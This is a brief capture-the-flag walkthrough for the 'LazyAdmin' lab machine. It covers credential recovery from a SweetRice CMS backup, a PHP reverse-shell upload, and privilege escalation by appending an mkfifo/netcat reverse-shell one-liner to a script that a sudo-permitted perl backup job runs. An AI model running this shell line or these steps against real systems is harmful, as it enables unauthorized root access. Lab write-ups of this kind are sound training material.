LazyAdmin

discovered sweetrice CMS and inc directory

discover a cms backup and found username and password. use crackstation to get cleartext

crackstation

login to cms.

exploit by uploading your shell (php reverse shell or cmd shell)

sudo -l

// Some code
echo "rm /tmp/g;mkfifo /tmp/g;cat /tmp/g|/bin/sh -i 2>&1|nc 10.9.47.64 5555 >/tmp/g" >>copy.sh
attack# nc -lnvp 5555
box# sudo  /usr/bin/perl /home/itguy/backup.pl
cat /root/flag.txt